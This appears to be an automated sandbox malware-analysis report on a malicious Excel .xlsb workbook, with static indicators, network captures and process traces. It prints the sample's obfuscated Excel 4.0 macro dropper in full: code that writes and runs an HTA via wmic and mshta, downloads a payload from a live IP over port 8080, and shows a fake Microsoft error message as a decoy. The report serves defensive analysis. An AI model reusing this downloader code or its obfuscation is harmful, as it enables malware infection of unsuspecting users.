                                                        SSDEEP:1536:UWqPFwJpvc1e+BwT8YIbDMz+1d6xw9boBltlDSSs9cwTIgdUpm:VNMrbDu+1d6xw8PclcwTIgdUc
                                                        File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4e2ea8aa4b4b4b4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OpenXML
                                                        Number of OLE Files:1

                                                        OLE File "942830.xlsb"

                                                        Indicators

                                                        Has Summary Info:
                                                        Application Name:
                                                        Encrypted Document:
                                                        Contains Word Document Stream:
                                                        Contains Workbook/Book Stream:
                                                        Contains PowerPoint Document Stream:
                                                        Contains Visio Document Stream:
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:

                                                        Macro 4.0 Code

                                                        0,564,=FOPEN("C:\Pr" & CHAR(111) & "gr" & CHAR(97) & "" & CHAR(109) & "Data\EvbrPIaoQqom.rt" & CHAR(102), 3)
                                                        2,564,=D5533+A5223
                                                        7,564,=A1868+A1946
                                                        11,564,=C4380+C7586
                                                        14,564,=FOR.CELL("nWZNlHtei",Sheet1!CP164:CQ2658, TRUE)
                                                        18,564,=D406+B412
                                                        21,564,=C6005+A2349
                                                        24,564,=A3461+B2499
                                                        26,564,=C4960+D4106
                                                        28,564,=FWRITE(0,CHAR(nWZNlHtei))
                                                        29,564,=C7710+D2165
                                                        33,564,=D5791+B2710
                                                        36,564,=D5293+B4187
                                                        38,564,=A6864+D7860
                                                        41,564,=B2108+C5352
                                                        43,564,=NEXT()
                                                        46,564,=A6496+B938
                                                        49,564,=A7432+B2701
                                                        52,564,=B3899+C143
                                                        56,564,=EXEC("" & CHAR(119) & "mic process ca" & CHAR(108) & "l crea" & CHAR(116) & "e " & CHAR(34) & "mshta C:\" & CHAR(80) & "" & CHAR(114) & "ogramD" & CHAR(97) & "ta\EvbrPIaoQqo" & CHAR(109) & ".rt" & CHAR(102) & "" & CHAR(34))
                                                        57,564,=B2843+A6723
                                                        58,564,=A3582+A920
                                                        59,564,=D1982+B865
                                                        60,564,=D9843+D5758
                                                        62,564,=C3983+C5558
                                                        63,564,=D462+C451
                                                        64,564,=B2389+A5133
                                                        65,564,=C6094+D4523
                                                        67,564,=CALL("urlmo" & CHAR(110), "URL" & CHAR(68) & "" & CHAR(111) & "wnl" & CHAR(111) & "adT" & CHAR(111) & CHAR(70) & "ile" & CHAR(65) & "","JJCCJ" & CHAR(74), 0, "http:/" & CHAR(47) & CHAR(49) & "36." & CHAR(49) & "44.181.174" & CHAR(58) & "8080/Q2" & CHAR(87) & "5VWUFL5VCMQ" & CHAR(55) & "JQPETG3CCTYX72Z" & CHAR(52) & "R25PD" & CHAR(71) & "", CHAR(67) & CHAR(58) & "\Prog" & CHAR(114) & "amData\QxvEWFGZz" & CHAR(115) & "RaLpM.t" & CHAR(120) & "" & CHAR(116) & "",0,0)
                                                        68,564,=B104+D204
                                                        69,564,=C4475+D1420
                                                        70,564,=A5173+B9471
                                                        72,564,=B2468+C8962
                                                        73,564,=B787+A8188
                                                        75,564,=D9546+A9346
                                                        78,564,=A9437+A373
                                                        79,564,=ALERT("" & CHAR(69) & "rror!" & CHAR(32) & "Sending report t" & CHAR(111) & " Micr" & CHAR(111) & CHAR(115) & CHAR(111) & "ft...")
                                                        80,564,=C5802+A9247
                                                        81,564,=B3530+C368
                                                        82,564,=B8109+D333
                                                        85,564,=B4090+A7127
                                                        86,564,=C8119+A6624
                                                        87,564,=D2397+C8265
                                                        89,564,=A8846+D8758
                                                        90,564,=B685+D4928
                                                        91,564,=B5722+C3018
                                                        93,564,=D3313+C4267
                                                        94,564,=FOPEN("C:\ProgramD" & CHAR(97) & "ta\QxvEWFG" & CHAR(90) & "zsRaL" & CHAR(112) & "M.txt",1)
                                                        95,564,=D1625+C227
                                                        97,564,=B9659+B1121
                                                        98,564,=A2894+D6284
                                                        100,564,=D3434+B6016
                                                        101,564,=C3988+B997
                                                        102,564,=C532+D1116
                                                        105,564,=B2645+B3278
                                                        106,564,=C6165+B5381
                                                        107,564,=A6261+D3436
                                                        109,564,=SEND.MAIL(EVALUATE(FREAD(US95,255)))
                                                        110,564,=C2438+B4014
                                                        114,564,=C526+A7371
                                                        115,564,=D313+D3521
                                                        118,564,=A9077+C9331
                                                        119,564,=B1552+C4204
                                                        122,564,=RETURN()
                                                        

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                        Nov 24, 2021 19:01:59.756293058 CET  49167        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:01:59.784006119 CET  8080         49167      136.144.181.174  192.168.2.22
                                                        Nov 24, 2021 19:02:00.282386065 CET  49167        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:02:00.310106039 CET  8080         49167      136.144.181.174  192.168.2.22
                                                        Nov 24, 2021 19:02:00.812792063 CET  49167        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:02:00.840646029 CET  8080         49167      136.144.181.174  192.168.2.22
                                                        Nov 24, 2021 19:02:00.842485905 CET  49168        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:02:00.870201111 CET  8080         49168      136.144.181.174  192.168.2.22
                                                        Nov 24, 2021 19:02:01.452440977 CET  49168        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:02:01.483283043 CET  8080         49168      136.144.181.174  192.168.2.22
                                                        Nov 24, 2021 19:02:01.982955933 CET  49168        8080       192.168.2.22     136.144.181.174
                                                        Nov 24, 2021 19:02:02.010921955 CET  8080         49168      136.144.181.174  192.168.2.22

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior


                                                        System Behavior

                                                        General

                                                        Start time:19:01:17
                                                        Start date:24/11/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                        Imagebase:0x13f640000
                                                        File size:28253536 bytes
                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:01:40
                                                        Start date:24/11/2021
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"
                                                        Imagebase:0xff440000
                                                        File size:566272 bytes
                                                        MD5 hash:FD902835DEAEF4091799287736F3A028
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:19:01:42
                                                        Start date:24/11/2021
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:mshta C:\ProgramData\EvbrPIaoQqom.rtf
                                                        Imagebase:0x13fa30000
                                                        File size:13824 bytes
                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis
